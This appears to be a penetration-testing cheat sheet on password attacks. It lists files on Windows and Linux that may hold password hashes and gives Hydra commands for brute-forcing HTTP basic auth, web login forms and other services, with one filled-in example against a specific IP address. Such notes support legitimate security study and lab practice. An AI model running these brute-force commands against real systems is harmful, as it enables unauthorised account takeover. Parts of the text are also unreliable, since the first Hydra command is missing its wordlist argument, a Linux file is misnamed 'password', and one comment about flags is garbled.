In Windows the following files might contain passwords hashes:
unattend.xml
sysprep.inf
SAM
In Linux the following files might contain passwords hashes:
shadow
shadow.bak
password
Since humans are generally lazy, it's a good idea to start by testing default credentials.
Hydra is a tool that can be used to do bruteforcing attacks.
CUPP is a tool that can be used to create customized wordlists.
Commands:
#Command to bruteforce a basic http authentication form
#Since we have the -C flag, the wordlist should be in the format Username:Password
hydra -C <Target-IP-Address> -s <Target-Port> http-get
#Command for seperate wordlists for usernames and passwords.
#The flag -u is to try all the usernames with the same password instead of the opposite (All passwords for one user).
hydra -L <Username-Word-List> -P <Password-Word-List> -u -f <Target-IP-Address> -s <Target-Port> http-get <Target-Path>
#Uppercase -L and -P flags is to specify flags. If you want to specify only 1 value then use lowercase flags followed by the value.
#To find the supported services by Hydra
hydra -h | grep "Supported services" | tr ":" "\n" | tr " " "\n" | column -e
#To bruteforce a PHP/Other authentication form
hydra -C <Credentials-Word-List> <Target-IP-Address> -s <Target-Port> http-post-form "<Login-Page-URI>:<Username-Parameter-Name>=^USER^&<Password-Parameter-Name>=^PASS^:F=<Code-Only-Exist-In-Login-Page>"
#Example:
hydra -C /opt/useful/SecLists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt 178.35.49.134 -s 32901 http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='login'"
#Service Bruteforcing
hydra -L <Username-Word-List> -P <Password-Word-List> -u -f ://<Target-IP-Address>:<Target-Port>
